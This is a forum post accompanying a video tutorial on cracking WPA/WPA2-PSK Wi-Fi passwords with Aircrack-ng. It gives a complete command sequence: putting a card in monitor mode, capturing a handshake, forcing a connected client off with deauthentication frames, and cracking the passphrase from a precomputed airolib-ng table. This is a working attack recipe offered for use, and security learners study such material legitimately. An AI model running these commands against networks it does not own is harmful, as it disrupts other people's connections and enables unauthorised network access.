Links
Watch on-line: http://g0tmi1k.blip.tv/file/2318855
Download: http://www.mediafire.com/?m0mwz2zxjmj
Commands: http://pastebin.com/f3041b00c

What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been "pre-salted" with the ESSID for the network to get the pass-phrase.


How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake


What do I need?

> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gzCommands:
Code:
airmon-ng start wlan0

airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0

aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0

airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all

aircrack-ng -r crackwpa output*.cap
Notes:
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECT client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03

Blog Post:http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
Forum Post: http://www.backtrack-linux.org/forum...irolib-ng.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html


~g0tmi1k